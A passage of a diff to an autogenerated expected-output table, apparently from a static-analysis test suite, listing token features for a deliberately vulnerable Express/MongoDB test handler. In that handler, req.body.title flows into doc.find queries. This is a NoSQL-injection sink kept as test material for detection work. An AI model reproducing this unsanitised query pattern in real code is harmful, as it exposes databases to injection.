enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:9 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:14 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:14 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:14 | doc.find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:14 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:14 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | exceptional return of doc.fin ... r(1) }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | exceptional return of doc.fin ... r(1) }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | exceptional return of doc.fin ... r(1) }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | exceptional return of doc.fin ... r(1) }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:7:24:53 | exceptional return of doc.fin ... r(1) }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:11:24:14 | find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:11:24:14 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:11:24:14 | find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:11:24:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:11:24:14 | find | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:16:24:52 | { title ... tr(1) } | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:16:24:52 | { title ... tr(1) } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:16:24:52 | { title ... tr(1) } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1550,6 +8317,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:16:24:52 | { title ... tr(1) } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:16:24:52 | { title ... tr(1) } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:16:24:52 | { title ... tr(1) } | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:22 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:22 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:22 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:22 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:22 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:18:24:50 | title: ... bstr(1) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:29 | query | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:29 | query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:29 | query | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:29 | query | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:34 | query.body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:34 | query.body | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:34 | query.body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:34 | query.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:34 | query.body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:40 | query.body.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:40 | query.body.title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:40 | query.body.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:40 | query.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:40 | query.body.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:47 | query.b ... .substr | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:47 | query.b ... .substr | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:47 | query.b ... .substr | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:47 | query.b ... .substr | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:47 | query.b ... .substr | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | exceptional return of query.b ... bstr(1) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | exceptional return of query.b ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | exceptional return of query.b ... bstr(1) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | exceptional return of query.b ... bstr(1) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | exceptional return of query.b ... bstr(1) | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | query.b ... bstr(1) | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | query.b ... bstr(1) | InputAccessPathFromCallee | 0.title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | query.b ... bstr(1) | InputArgumentIndex | 0 | @@ -1559,6 +8366,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | query.b ... bstr(1) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | query.b ... bstr(1) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:25:24:50 | query.b ... bstr(1) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:31:24:34 | body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:31:24:34 | body | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:31:24:34 | body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:31:24:34 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:31:24:34 | body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:36:24:40 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:36:24:40 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:36:24:40 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:36:24:40 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:36:24:40 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:42:24:47 | substr | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:42:24:47 | substr | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:42:24:47 | substr | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:42:24:47 | substr | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:42:24:47 | substr | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:49:24:49 | 1 | CalleeFlexibleAccessPath | query.body.title.substr | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:49:24:49 | 1 | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:49:24:49 | 1 | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1566,6 +8388,96 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:49:24:49 | 1 | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:49:24:49 | 1 | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:24:49:24:49 | 1 | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:15 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:15 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:15 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:15 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:15 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title = ... y.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title = ... y.title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title = ... y.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title = ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:11:26:32 | title = ... y.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:21 | req | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:21 | req | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:21 | req | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:21 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:21 | req | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:26 | req.body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:26 | req.body | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:26 | req.body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:26 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:26 | req.body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:32 | req.body.title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:32 | req.body.title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:32 | req.body.title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:32 | req.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:19:26:32 | req.body.title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:23:26:26 | body | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:23:26:26 | body | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:23:26:26 | body | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:23:26:26 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:23:26:26 | body | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:28:26:32 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:28:26:32 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:28:26:32 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:28:26:32 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:26:28:26:32 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:22 | typeof title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:22 | typeof title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:22 | typeof title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:22 | typeof title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:22 | typeof title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | typeof ... string" | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | typeof ... string" | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | typeof ... string" | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | typeof ... string" | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:11:27:35 | typeof ... string" | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:18:27:22 | title | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:18:27:22 | title | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:18:27:22 | title | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:18:27:22 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:18:27:22 | title | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:28:27:35 | "string" | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:28:27:35 | "string" | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:28:27:35 | "string" | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:28:27:35 | "string" | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:27:28:27:35 | "string" | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:11 | doc | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:11 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:11 | doc | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:11 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:11 | doc | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:16 | doc.find | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:16 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:16 | doc.find | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:16 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:16 | doc.find | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | doc.fin ... itle }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | doc.fin ... itle }) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | doc.fin ... itle }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find title query body title substr 1 title req body title title string doc find title title doc find title JSON parse title | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | doc.fin ... itle }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | doc.fin ... itle }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | exceptional return of doc.fin ... itle }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | exceptional return of doc.fin ... itle }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:29:9:29:34 | exceptional return of doc.fin ... itle }) | enclosingFunctionBody | req res query query title req body title MongoClient connect mongodb://localhost:27017/test err db doc db collection doc doc find query doc find title query body title doc find 